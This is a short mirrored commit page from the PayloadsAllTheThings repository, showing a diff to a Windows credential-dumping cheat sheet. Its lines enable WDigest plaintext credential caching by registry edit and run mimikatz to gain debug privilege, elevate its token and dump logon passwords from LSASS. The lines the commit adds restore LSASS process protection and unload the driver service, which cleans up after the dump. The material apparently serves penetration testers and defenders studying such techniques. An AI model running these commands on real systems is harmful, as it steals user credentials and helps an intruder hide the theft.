mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-21 22:23:45 +00:00
Merge pull request #338 from mpgn/patch-1
Add mimikatz command to protect a process after removing the protection
This commit is contained in:
commit
e128964dd9
@ -77,6 +77,12 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||
mimikatz # privilege::debug
|
||||
mimikatz # token::elevate
|
||||
mimikatz # sekurlsa::logonpasswords
|
||||
|
||||
# Now lets re-add the protection flags to the lsass.exe process
|
||||
mimikatz # !processprotect /process:lsass.exe
|
||||
|
||||
# Unload the service created
|
||||
mimikatz # !-
|
||||
```
|
||||
|
||||
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
||||
|
Loading…
Reference in New Issue
Block a user